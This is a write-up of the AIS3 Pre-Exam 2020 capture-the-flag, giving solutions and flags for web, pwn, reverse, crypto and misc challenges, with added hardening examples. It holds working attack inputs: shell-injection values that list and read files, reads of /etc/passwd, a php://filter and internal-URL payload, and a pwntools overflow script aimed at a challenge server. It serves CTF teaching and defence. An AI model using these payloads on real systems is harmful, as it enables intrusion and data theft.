
AIS3 Pre-Exam 2020 WriteUp

🌐Web

🐘Elephant

Challenge description:
Do elephants love cookies?

https://elephant.ais3.org/

IMPORTANT

  • There’s a hint in the webpage

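Solution:

  1. Obtain the cookie
  2. Base64-decode it
  3. Fix the incorrect parameter in the serialized data
  4. Base64-encode it
  5. Use a cookie editor to set the newly encoded value as the cookie
  6. Press F5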

Flag:

AIS3{0nly_3l3ph4n75_5h0uld_0wn_1v0ry}


🐿️Squirrel

Challenge description:
Hack those creepy rats.

https://squirrel.ais3.org/

Solution:

Open the page and view its source code.
It contains this piece of JavaScript:

const squirrelFile = '/etc/passwd';
fetch('api.php?get=' + encodeURIComponent(squirrelFile))
    .then(res => res.json())
    .then(data => {
        if ('error' in data) {
            throw data.error;
        }
        data.output.split('\n')
            .map(line => line.split(':')[0].trim())
            .filter(name => name.length)
            .forEach(name => new Squirrel(name).update());
    })
    .catch(err => {
        console.log(err);
        alert('Something went wrong! Please report this to the author!');
    });

GET /api.php?get=
The response is a piece of JSON:

{"error":"empty file path"}

Next, GET ?get=/etc/passwd
The response contains the contents of /etc/passwd:

{"output":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n"}

This suggests either command injection or local file inclusion.
Next, try ?get=';ls'
Response:

{"output":"api.php\ncss\nindex.html\njs\n"}

This confirms it is command injection (CMDi).
Now look for where the flag is.
GET ?get=';ls /'
Response:

{"output":"5qu1rr3l_15_4_k1nd_0f_b16_r47.txt\nbin\nboot\ndev\netc\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n"}

There is a suspicious file,
presumably the flag.
Try to cat it:
GET ?get=';cat /5qu1rr3l_15_4_k1nd_0f_b16_r47.txt'

Flag:

AIS3{5qu1rr3l_15_4_k1nd_0f_b16_r47}
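
Why a value shaped like `';ls'` runs a second command, and a handler that avoids it, as an added example that is not the challenge's code. `api.php` is not shown in this write-up, so `read_vulnerable` assumes the server pastes the parameter into a single-quoted `cat` command; the file names and the `echo INJECTED` marker are constructed.

```python
import subprocess
import tempfile
from pathlib import Path


def read_vulnerable(path: str) -> str:
    # Assumed server behaviour: parameter pasted inside single quotes, run by a shell.
    cmd = "cat '" + path + "'"
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout


def read_hardened(path: str, base: Path) -> str:
    # No shell at all: resolve the path and require a regular file under `base`.
    root = base.resolve()
    target = (root / path).resolve()
    if root not in target.parents or not target.is_file():
        raise ValueError("path not allowed")
    return target.read_text()


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "names.txt").write_text("root\n")   # constructed sample file
        probe = "';echo INJECTED'"                    # same shape as ';ls', harmless marker
        # The quote in the value closes the quoted argument, ';' starts a new command.
        results = {"vulnerable": read_vulnerable(probe).strip()}
        for candidate in (probe, "/etc/passwd", "../names.txt", "names.txt"):
            try:
                results[candidate] = read_hardened(candidate, base)
            except ValueError as exc:
                results[candidate] = f"rejected: {exc}"
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r:22} -> {value!r}")
```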


🦈Shark

Challenge description:
Let’s dive deep again this year.

https://shark.ais3.org/

The page contains a hyperlink.
Clicking it shows a hint:

Please find the other server in the internal network! (flag is on that server)

    GET http://some-internal-server/flag

The URL shows that the hint is fetched with GET /?path=hint.txt,
which suggests an LFI problem.
Try GET /?path=index.php
This successfully shows the source code:

<?php
    if ($path = @$_GET['path']) {
        if (preg_match('/^(\.|\/)/', $path)) {
            // disallow /path/like/this and ../this
            die('<pre>[forbidden]</pre>');
        }
        $content = @file_get_contents($path, FALSE, NULL, 0, 1000);
        die('<pre>' . ($content ? htmlentities($content) : '[empty]') . '</pre>');
    }
?><!DOCTYPE html>
<head>
    <title>🦈🦈🦈</title>
    <meta charset="utf-8">
</head>
<body>
    <h1>🦈🦈🦈</h1>
    <a href="?path=hint.txt">Shark never cries?</a>
</body>

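The hint says to find another machine on the internal network and look for the flag there,
so try reading this machine's /etc/hosts.
The source code shows that path is checked with a regular expression,
so it has to be bypassed.
Try bypassing it with a Base64 filter.
Payload:?path=php://filter/convert.base64-encode/resource=/etc/hosts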

Response:

MTI3LjAuMC4xCWxvY2FsaG9zdAo6OjEJbG9jYWxob3N0IGlwNi1sb2NhbGhvc3QgaXA2LWxvb3BiYWNrCmZlMDA6OjAJaXA2LWxvY2FsbmV0CmZmMDA6OjAJaXA2LW1jYXN0cHJlZml4CmZmMDI6OjEJaXA2LWFsbG5vZGVzCmZmMDI6OjIJaXA2LWFsbHJvdXRlcnMKMTcyLjIyLjAuMwkwMmIyMzQ2NzQ4NWUK

Base64 Decode:

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.22.0.3	02b23467485e

The host is 172.22.0.3,
so check whether anything is at .2 and .4.
Something is at .2:

<!DOCTYPE html> <html> <head> <title>Welcome to nginx!</title> <style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body> <h1>Welcome to nginx!</h1> <p>If you see this page, the nginx web server is successfully installed and working. Further configuration is required.</p> <p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br/> Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p> <p><em>Thank you for using nginx.</em></p> </body> </html>

Try to find the flag.
Payload:?path=http://172.22.0.2/flag

Flag:

AIS3{5h4rk5_d0n’7_5w1m_b4ckw4rd5}
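
Why both payloads pass the check in `index.php`, next to a stricter policy, as an added example that is not the challenge's code. The regex only inspects the first character, so stream wrappers and URLs go straight to `file_get_contents`; `DOCROOT`, `PUBLIC_FILES` and `strict_check` are assumptions made for this illustration.

```python
import posixpath
import re

PAGE_REGEX = re.compile(r"^(\.|/)")                  # the check in the challenge's index.php
SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")   # php://, http://, file:, ...
DOCROOT = "/var/www/html"                            # assumed document root
PUBLIC_FILES = {"hint.txt"}                          # assumed allowlist of readable files


def page_check(path: str) -> bool:
    """True when the original filter lets the value through."""
    return PAGE_REGEX.match(path) is None


def strict_check(path: str):
    """Return (allowed, reason) under an allowlist policy."""
    if "\x00" in path or SCHEME.match(path):
        return False, "stream wrapper or URL scheme"
    full = posixpath.normpath(posixpath.join(DOCROOT, path))
    if not full.startswith(DOCROOT + "/"):
        return False, "outside document root"
    if full[len(DOCROOT) + 1:] not in PUBLIC_FILES:
        return False, "not on the allowlist"
    return True, "ok"


# Values taken from the write-up, plus two that the original regex already blocks.
SAMPLES = [
    "hint.txt",
    "index.php",
    "php://filter/convert.base64-encode/resource=/etc/hosts",
    "http://172.22.0.2/flag",
    "/etc/hosts",
    "../secret",
]


def audit():
    """One row per sample: (value, passes page regex, passes strict policy, reason)."""
    return [(s, page_check(s), *strict_check(s)) for s in SAMPLES]


if __name__ == "__main__":
    for value, page_ok, strict_ok, reason in audit():
        print(f"{value:58} page={page_ok!s:5} strict={strict_ok!s:5} {reason}")
```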


🐍Snake

Challenge description:
How to read that flag?

https://snake.ais3.org/
Source Code:

from flask import Flask, Response, request
import pickle, base64, traceback

Response.default_mimetype = 'text/plain'

app = Flask(__name__)

@app.route("/")
def index():
    data = request.values.get('data')

    if data is not None:
        try:
            data = base64.b64decode(data)
            data = pickle.loads(data)

            if data and not data:
                return open('/flag').read()

            return str(data)
        except:
            return traceback.format_exc()

    return open(__file__).read()

This appears to be an unintended solution.

Solution:

Python Serialization and Base64 code

import pickle
import base64

if __name__ == '__main__':
    pickled = pickle.dumps("print('open('/flag').read()')")
    print(base64.b64encode(pickled))

Quest Python Test Code

import pickle
import base64
import os

data3 = 'success'
data2 = 'gASVCQAAAAAAAACMBWRhdGEzlC4='
data = 'gASVCQAAAAAAAACMBWRhdGEzlC4='
data = base64.b64decode(data)
print(data)
data = pickle.loads(data)
print(data)
if data and not data:
    print('true')
else:
    print('false')
print(data)
print(str(print((data))))

Payload

?data=gASVIQAAAAAAAACMHXByaW50KCdvcGVuKCcvZmxhZycpLnJlYWQoKScplC4=

Flag:

AIS3{7h3_5n4k3_w1ll_4lw4y5_b173_b4ck.}
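
The risk in the handler above is `pickle.loads` on request data: a pickle stream can name any importable callable and have it invoked during loading. An added example, not the challenge's code, of an unpickler that refuses every such reference; `NoGlobalsUnpickler`, `restricted_loads` and the `Probe` class are names made up for this sketch, and `Probe` is a constructed, harmless stand-in.

```python
import base64
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every class or function reference in the stream."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(b64_text: str):
    # Same decoding step as the handler, but only plain data types can come back.
    raw = base64.b64decode(b64_text, validate=True)
    return NoGlobalsUnpickler(io.BytesIO(raw)).load()


class Probe:
    """Constructed, harmless stand-in: unpickling it only calls len('abc')."""

    def __reduce__(self):
        return (len, ("abc",))


def demo():
    plain = base64.b64encode(pickle.dumps("data3")).decode()
    probe = base64.b64encode(pickle.dumps(Probe())).decode()
    out = {
        "plain_restricted": restricted_loads(plain),
        # Stock pickle.loads calls whatever callable the stream names.
        "probe_stock": pickle.loads(base64.b64decode(probe)),
    }
    try:
        restricted_loads(probe)
        out["probe_restricted"] = "loaded"
    except pickle.UnpicklingError as exc:
        out["probe_restricted"] = f"blocked: {exc}"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18} {value!r}")
```

Where the endpoint only needs strings, numbers, lists and dicts, parsing JSON instead of pickle removes the problem entirely.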


🦏Rhino

Challenge description:
Do you know why is this challenge called Rhino?

https://rhino.ais3.org/
/package.json

// 20200612172354
// https://rhino.ais3.org/package.json

{
  "name": "app",
  "version": "1.0.0",
  "description": "",
  "scripts": {
    "start": "node chill.js",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "djosix",
  "license": "ISC",
  "dependencies": {
    "cookie-session": "^1.4.0",
    "express": "^4.17.1"
  }
}

/chill.js

const express = require('express');
const session = require('cookie-session');

let app = express();

app.use(session({
    secret: "I'm watching you."
}));

app.use('/', express.static('./'));

app.get('/flag.txt', (req, res) => {
    res.setHeader('Content-Type', 'text/plain');

    let n = req.session.magic;

    if (n && (n + 420) === 420)
        res.sendFile('/flag');
    else
        res.send('you are a sad person too');
});

app.get('*', function(req, res){
    res.status(404).sendFile('404.html', { root: __dirname });
});

app.listen(process.env.PORT, '0.0.0.0');

🦉Owl

Challenge description:
Flag is inside the database.

https://turtowl.ais3.org/

IMPORTANT

  • There's a hint in the webpage
  • This is a hybrid challenge with Turtle in Crypto

/?source

<?php

    if (isset($_GET['source'])) {
        highlight_file(__FILE__);
        exit;
    }

    // Settings
    ini_set('display_errors', 1);
    ini_set('display_startup_errors', 1);
    error_reporting(E_ALL);
    date_default_timezone_set('Asia/Taipei');
    session_start();

    // CSRF
    if (!isset($_SESSION['csrf_key']))
        $_SESSION['csrf_key'] = md5(rand() * rand());
    require_once('csrf.php');
    $csrf = new Csrf($_SESSION['csrf_key']);

    if ($action = @$_GET['action']) {
        function redirect($path = '/', $message = null) {
            $alert = $message ? 'alert(' . json_encode($message) . ')' : '';
            $path = json_encode($path);
            die("<script>$alert; document.location.replace($path);</script>");
        }

        if ($action === 'logout') {
            unset($_SESSION['user']);
            redirect('/');
        }
        else if ($action === 'login') {
            // Validate CSRF token
            $token = @$_POST['csrf_token'];
            if (!$token || !$csrf->validate($token)) {
                redirect('/', 'invalid csrf_token');
            }

            // Check if username and password are given
            $username = @$_POST['username'];
            $password = @$_POST['password'];
            if (!$username || !$password) {
                redirect('/', 'username and password should not be empty');
            }

            // Get rid of sqlmap kiddies
            if (stripos($_SERVER['HTTP_USER_AGENT'], 'sqlmap') !== false) {
                redirect('/', "sqlmap is child's play");
            }

            // Get rid of you
            $bad = [' ', '/*', '*/', 'select', 'union', 'or', 'and', 'where', 'from', '--'];
            $username = str_ireplace($bad, '', $username);
            $username = str_ireplace($bad, '', $username);

            // Auth
            $hash = md5($password);
            $row = (new SQLite3('/db.sqlite3'))
                ->querySingle("SELECT * FROM users WHERE username = '$username' AND password = '$hash'", true);
            if (!$row) {
                redirect('/', 'login failed');
            }
            $_SESSION['user'] = $row['username'];
            redirect('/');
        }
        else {
            redirect('/', "unknown action: $action");
        }
    }

    $user = @$_SESSION['user'];

?><!DOCTYPE html>
<head>
    <title>🦉🦉🦉🦉</title>
    <meta charset='utf-8'>
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
    <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<body>
    <?php if (!$user): ?>
        <div id="login">
            <h3 class="text-center text-white pt-5">GUESS THE STUPID USERNAME / PASSWORD</h3>
            <div class="container">
                <div id="login-row" class="row justify-content-center align-items-center">
                    <div id="login-column" class="col-md-6">
                        <div id="login-box" class="col-md-12">
                            <form id="login-form" class="form" action="?action=login" method="post">
                                <input type="hidden" name="csrf_token" value="<?= htmlentities($csrf->generate()) ?>">
                                <h3 class="text-center text-info">🦉: "Login to see cool things!"</h3>
                                <div class="form-group">
                                    <label for="name" class="text-info">Username:</label><br>
                                    <input type="text" name="username" id="username" class="form-control"><br>
                                    <label for="name" class="text-info">Password:</label><br>
                                    <input type="text" name="password" id="password" class="form-control"><br>
                                </div>
                                <div class="form-group">
                                    <input type="submit" name="submit" class="btn btn-info btn-md" value="Login">
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    <?php else: ?>
        <h3 class="text-center text-white pt-5"><a style="color: white" href="/?source">SHOW HINT</a></h3>
        <div class="container">
            <div class="row justify-content-center align-items-center">
                <div class="col-md-6">
                    <div class="col-md-12">
                        <h3 class="text-center text-info">Nothing</h3>
                        Hello, <b><?= htmlentities($user) ?></b>, nothing here.
                        <a href="?action=logout">Logout!</a>
                    </div>
                </div>
            </div>
        </div>
    <?php endif ?>
</body>

💥 Pwn

👻 BOF

Challenge description:
That is easy-peasy challenge and even my grandma can do.

nc 60.250.197.227 10000

Challenge environment: Ubuntu 18.04
Files:
bof-767fdf896cf9838c0294db24eaa1271ebf15a6e638a873e94ab9682ef28464b4

Solution:

from pwn import *

context.log_level = 'debug'
r = remote('60.250.197.227', '10000')
# 0x30 + 8 bytes of padding, followed by the address 0x400688
payload = b'a' * (0x30 + 8) + p64(0x400688)
r.recvline()
r.sendline(payload)
r.interactive()

Flag:

AIS3{OLd_5ChOOl_tr1ck_T0_m4Ke_s7aCk_A116nmeNt}


📃 Nonsense

Challenge description:
Welcome to Rick and Morty’s crazy world. Say something!

Rick’s stupid nonsense catchphrase is “wubba lubba dub dub”.

nc 60.250.197.227 10001

Challenge environment: Ubuntu 18.04
Files:
nonsense-8ccbca2ca7f8825c843596a09c0806275a5b3fdf1c6c570bc0276fb0afc9210c


🔫 Portal gun

Challenge description:
The Portal Gun is a gadget that allows the user(s) to travel between different universes/dimensions/realities.

Try to get the shell and avoid the hook!

nc 60.250.197.227 10002

Challenge environment: Ubuntu 18.04
Files:
hook.so-997c848132f9fae3a5ffdb0edf7c9071a0dcdebb99c116c5bd011efd28c942ae
portal_gun-43fcd0f6ae670ddb11a66bbfbca721410941ee30a5d1d802a6f509bcf7a765ac
libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d


🏫 Morty school

Challenge description:

Welcome to Morty school _

We need you to teach Morty. And then you can get the shell!

nc 60.250.197.227 10003

Challenge environment: Ubuntu 18.04

Files:

morty_school-d97056f03b991d718b35ef47fcfcaeb15f971b60b58d0eb0fcd8dcf3a3a11a99
libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d


🔮Death crystal

Challenge description:
Death Crystals are crystals found on Forbodulon Prime that allow those who wield it to foresee their death in multiple possible future scenarios.

Before you died, you can see the message I left.

nc 60.250.197.227 10004

Challenge environment: Ubuntu 18.04

Files:

death_crystal-5c5baf0fb1ef4690eb472dc579403af6248be7a6815a89906b2c22ce55d73529


📦Meeseeks box

Challenge description:
The Mr. Meeseeks Box is a gadget that creates a Mr. Meeseeks for the purpose of completing one given objective.

Just keep your requests simple. They are not Gods.

nc 60.250.197.227 10005

Challenge environment: Ubuntu 18.04

Files:

meeseeks_box-46937361847a6ed6df9ee20eea7eb59b70db5d9779ca2b94e481bc57fd130873
libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d


♻️Reverse

🍍TsaiBro

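Challenge description:
Great, are you brain-dead? How dare you talk about Sword Art Online like that. I will never let you off, even if I die. I.. will.. kill you..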


author: terrynini

Files:
TsaiBro
TsaiBroSaid

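Solution:
There are two ways to solve it:

  1. Disassemble with IDA Pro, work out the pattern from the code, then write code that lists the mapping directly
  2. Brute-force the pattern: build a table, then match the symbols one by one

Cipher table: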

11	5	21	W	31	a	41	S	51	K	61	w	71	i	81	C
12	6	22	X	32	b	42	T	52	L	62	f	72	j	82	D
13	7	23	Y	33	c	43	U	53	M	63	g	73	k	83	E
14	8	24	0	34	d	44	V	54	N	64	h	74	l	84	F
15	9	25	y	35	m	45	G	55	u	65	q	75	O	85	1
16	{	26	z	36	n	46	H	56	v	66	r	76	P	86	2
17	}	27	A	37	o	47	I	57	w	67	s	77	Q	87	3
18	_	28	B	38	p	48	J	58	x	68	t	78	R	88	4

Ciphertext:

Terry...逆逆...沒有...學問...單純...分享...個人...生活...感觸...
發財..發財.......發財....發財.......發財....發財.發財........發財.......發財.發財......發財..發財.....發財........發財.......發財......發財.......發財.發財........發財..發財.....發財..發財....發財.....發財.....發財.發財........發財......發財....發財........發財........發財.....發財......發財......發財.發財.發財........發財......發財.......發財........發財........發財.....發財.......發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財...發財...發財......發財....發財........發財........發財.......發財....發財.......發財....發財........發財.......發財...發財......發財......發財...發財........發財.......發財.發財........發財...發財..發財......發財.發財......發財..發財..發財....發財......發財......發財........發財.......發財.發財........發財...發財..發財.....發財.....發財.發財...發財.發財........發財.......發財.發財......發財........發財......發財.......發財.發財........發財...發財.....發財..發財....發財......發財......發財........發財.......發財.發財........發財.......發財....發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財......發財......發財...發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財......發財........發財........發財.....發財...發財.....發財........發財.......發財.發財.......

Flag:

AIS3{y3s_y0u_h4ve_s4w_7h1s_ch4ll3ng3_bef0r3_bu7_its_m0r3_looooooooooooooooooong_7h1s_t1m3}
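
The "write code" route, as an added example that is not the author's script: each `發財` followed by N dots is the digit N, and each pair of digits is one code in the cipher table. `ROWS` and `decode` are names made up here; the table is transcribed from this page, except that 61 is taken as `e`, because the page's table prints `w` for both 57 and 61 while the ciphertext and flag above need 61 to be `e` (the `h4ve`).

```python
import re

# Cipher table from the write-up: the first digit selects a row here,
# the second digit (1-8) selects the character within it.
# Assumption: 61 is 'e' (see the note above), not the 'w' printed in the table.
ROWS = {
    1: "56789{}_",
    2: "WXY0yzAB",
    3: "abcdmnop",
    4: "STUVGHIJ",
    5: "KLMNuvwx",
    6: "efghqrst",
    7: "ijklOPQR",
    8: "CDEF1234",
}

TOKEN = re.compile(r"發財(\.+)")   # one symbol: the marker plus a run of dots


def decode(ciphertext: str) -> str:
    """Turn runs of dots into digits, pair them up and look each pair up."""
    digits = [len(m.group(1)) for m in TOKEN.finditer(ciphertext)]
    if len(digits) % 2:
        raise ValueError("odd number of symbols: the last digit pair is incomplete")
    out = []
    for tens, units in zip(digits[0::2], digits[1::2]):
        if tens not in ROWS or not 1 <= units <= 8:
            raise ValueError(f"code {tens}{units} is not in the table")
        out.append(ROWS[tens][units - 1])
    return "".join(out)


# Dot counts of the first ten symbols of the ciphertext on this page.
PREFIX = "".join("發財" + "." * n for n in (2, 7, 4, 7, 4, 1, 8, 7, 1, 6))

if __name__ == "__main__":
    print(decode(PREFIX))
```

Text without the `發財` marker, such as the first line of the ciphertext file, is skipped by the regex.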


🎹Fallen Beat

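Challenge description:
CTF player,

I challenge you, I'm gonna challenge you!!

ZR

This is my roommate and labmate,

he has already passed the gold-frame 暴龍天 rank, he is a knob player,

unlike you, who just bangs on a keyboard,

so I want to find out how good you really are,

let's settle this with ZR's freshman-year project!!

Get a Full Combo and impress me!!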

author: terryninien

Files:
Fallen_Beat.zip

Solution:

  1. Decompile with Radare2
  2. Find the enflag array
  3. XOR it with the hell.txt chart to get the flag

*Note: drop the first two lines of the hell.txt chart
Code:

var fs = require("fs");
var cache = fs.readFileSync("hell.txt", "utf8").split("\n").map(v=>parseInt(v));
var enflag = [89, 74, 75, 43, 126, 69, 120, 109, 68, 109, 109, 97, 73, 110, 45, 113, 102, 64, 121, 47, 111, 119, 111, 71, 114, 125, 68, 105, 127, 124, 94, 103, 46, 107, 97, 104];
for(var i=0 ; i < cache.length ; i++){
    var flag = enflag;
    var n = i % enflag.length;
    flag[n] ^= cache[i];
}
console.log(enflag.map(v=>String.fromCharCode(v)));

Flag:

AIS3{Wow_how_m4ny_h4nds_do_you_h4ve}


🧠 Stand up!Brain

Challenge description:
It's time for Brain to tell me a joke again

This time it's your turn to tell a joke


author: terrynini

Files:
joke

Solution:

  1. Run the Linux terminal command 'strings joke'
  2. Look at the strings:
-------------------------------------------------------------------[>[-]<[-]]>[>--------------------------------------------------------[>[-]<[-]]>[>-------------------------------------------------------[>[-]<[-]]>[>------------------------------------------------------[>[-]<[-]]>[>---------------------------------------------------[>[-]<[-]]>[>---------------------------------[>[-]<[-]]>[>>----[---->+<]>++.++++++++.++++++++++.>-[----->+<]>.+[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]]
  3. Encode 'AIS3{' in Brainfuck:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++.
  4. Replace the leading section with it, giving:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++.[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]]

Flag:

AIS3{Th1s_1s_br4iNFUCK_bu7_m0r3_ez}


🍹Long Island Iced Tea

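Challenge description:
Long · Island · Iced · Tea

My · fa · vor · ite

Long · Island · Iced · Tea

So · re · fresh · ing

Dong dong dong kiang

Dong dong dong kiang

Dong dong dong kiang

I am really so kiang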

author: terrynini

Files:
Long_Island_Iced_Tea
flag


🌹La vie en rose

Challenge description:

author: terrynini

Files:
La_vie_en_rose.exe


🐉Uroboros

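Challenge description:
Hello, big brother Edward, I really didn't expect you to make it to the 25th floor!

But this is as far as you go,

from here on, I, Anti-Gravity Three-Headed Chain Connie·Liberation·Crimson, will be your opponent!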

author: terrynini

Files:
Uroboros


🙊Crypto

🦕Brontosaurus

Challenge description:
Brontosaurus peek at last year’s problems with a long neck and picked up “KcufsJ”.
Files:
KcufsJ

Solution:
Reverse the string, then paste it into the browser's F12 tools.

Flag:

AIS3{Br0n7Os4uru5_ch3at_3asi1Y}


🦖T-Rex

Challenge description:
Tyrannosaurus-rex is an nihilist.
Files:
prob

Solution:
There are two ways to solve it:

  1. Write code to list it out
  2. Match the symbols one by one

Cipher table:

!!    V    @!    F    #!    Y    $!    %!    6    &!    1
!@    S    @@    0    #@    M    $@    %@    9    &@    L
!#    I    @#    W    ##    H    $#    %#    4    &#    Q
!$    K    @$    G    #$    B    $$    %$    T    &$    A
!%    E    @%    3    #%    C    $%    %%    P    &%    N
!&    U    @&    Z    #&    8    $&    %&    D    &&    O

Ciphertext:

&$ !# $# @% {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}

Flag:

AIS3{TYR4NN0S4URU5_R3X_GIV3_Y0U_SOMETHING_RANDOM_5TD6XQIVN3H7EUF8ODET4T3H907HUC69L6LTSH4KN3EURN49BIOUY6HBFCVJRZP0O83FWM0Z59IISJ5A2VFQG1QJ0LECYLA0A1UYIHTIIT1IWH0JX4T3ZJ1KSBRM9GED63CJVBQHQORVEJZELUJW5UG78B9PP1SIRM1IF500H52USDPIVRK7VGZULBO3RRE1OLNGNALX}


🐡 Blowfish

Challenge description:
Don’t poke the puffer, it is poisonous.

nc 60.250.197.227 12001
Files:
prob.py
user.pickle


🐙 Octopus

Challenge description:

BB84 quantum key distribution has 8 main directions,

just like a cute octopus A __ A.

Files:
prob.py
output


🐪Camel

Challenge description:

Wow!! There is an elliptic curve on the camel.

Files:
prob.sage


🐢Turtle

Challenge description:

Try to decrypt the secret!

https://turtowl.ais3.org/csrf.php?source

/csrf.php?source

<?php

    class Csrf {
        private $secret, $key, $size;
        
        function __construct($key) {
            $this->key = $key;
            $this->secret = file_get_contents('/turtle.flag');
            $this->size = openssl_cipher_iv_length('aes-256-cbc');
        }
        
        function generate() {
            $iv = openssl_random_pseudo_bytes($this->size);
            $cipher = openssl_encrypt($this->secret, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv);
            $token = base64_encode($iv . $cipher);
            return $token;
        }
        
        function validate($token) {
            $bytes = base64_decode($token);
            $iv = substr($bytes, 0, $this->size); // extract IV
            $cipher = substr($bytes, $this->size); // extract cipher
            $secret = openssl_decrypt($cipher, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv);
            if ($secret === false)
                throw new Exception('token decryption failed');
            return $secret === $this->secret;
        }    
    }

    if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])) {
        // called directly

        if (isset($_GET['source'])) {
            highlight_file(__FILE__);
        }
        exit;
    }

🐧Misc

💤Piquero

Challenge description:

I can’t see the flag. Where is it?

Files:
Piquero_99c9aa83fe492df8d52229017d4dca92297c9aeb.jpg

Solution:
Cross-check the results of several online tools.
Pay attention to some of the special symbols.

Flag:

AIS3{I_feel_sleepy_Good_Night!!!}


🐥Karuego

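Challenge description:
Students who fail to summon will be dropped out.
Files:
Karuego_0d9f4a9262326e0150272debfd4418aaa600ffe4.png

Solution:
binwalk shows that the file contains a ZIP archive and that it is encrypted.
Use dd to extract the hidden ZIP.
fcrackzip can brute-force the password.
The flag is then visible on the image inside.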

Flag:

AIS3{Ar3_y0u_r34l1y_r34dy_t0_sumnn0n_4_D3m0n?}


🌱Soy

Challenge description:
Here is your flag. Oops, my bad.

Files:
Soy_b692c44dd2a32b30eee8a9315091d79f7dd8c8a8.png

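Solution:
Use this online tool to redraw the parts that are still readable,
then use Tools > Extract QR Information at the top right to force the information to be decoded.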

Flag:

AIS3{H0w_c4n_y0u_f1nd_me?!?!?!!}


👑Saburo

Challenge description:
Spell you flag and fight with me.

PS. flag is printable characters with AIS3{…}

nc 60.250.197.227 11001

Solution:

Write code to brute-force it

Flag:

AIS3{A1r1ght_U_4r3_my_3n3nnies}


👿Shichirou

Challenge description:
Don’t cheat!!! I’m wathcing you!!

nc 60.250.197.227 11000
Files: Shichirou_1869833657e9fef14ad2742e59bb96f4630db429.py


🧸Clara

Challenge description:
I did nothing special today. >_<

Files:
